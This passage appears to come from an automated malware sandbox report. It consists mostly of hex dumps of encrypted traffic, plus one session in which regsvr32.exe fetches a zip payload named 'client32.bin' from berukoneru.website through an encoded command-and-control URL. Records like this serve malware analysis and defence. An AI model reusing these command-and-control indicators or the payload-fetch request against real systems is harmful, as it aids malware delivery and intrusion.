                          Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                          2021-12-14 09:34:07 UTC998INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                          Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                          2021-12-14 09:34:07 UTC1014INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                          Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                          2021-12-14 09:34:07 UTC1030INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                          Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                          2021-12-14 09:34:07 UTC1046INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                          Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                          2021-12-14 09:34:07 UTC1062INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                          Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                          2021-12-14 09:34:07 UTC1078INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                          Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                          2021-12-14 09:34:07 UTC1094INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                          Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          5192.168.2.54980279.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:07 UTC1101OUTGET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC1102INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 268426
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=hknqubagd3jvbvckr7p3s9hgo7; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1102INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                          Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                          2021-12-14 09:34:08 UTC1118INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                          Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                          2021-12-14 09:34:08 UTC1198INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                          Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                          2021-12-14 09:34:08 UTC1214INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                          Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                          2021-12-14 09:34:08 UTC1230INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                          Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                          2021-12-14 09:34:08 UTC1310INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                          Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                          2021-12-14 09:34:08 UTC1326INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                          Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                          2021-12-14 09:34:08 UTC1374INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                          Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                          2021-12-14 09:34:08 UTC1390INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                          Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                          2021-12-14 09:34:08 UTC1406INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                          Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                          2021-12-14 09:34:08 UTC1422INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                          Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                          2021-12-14 09:34:08 UTC1566INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 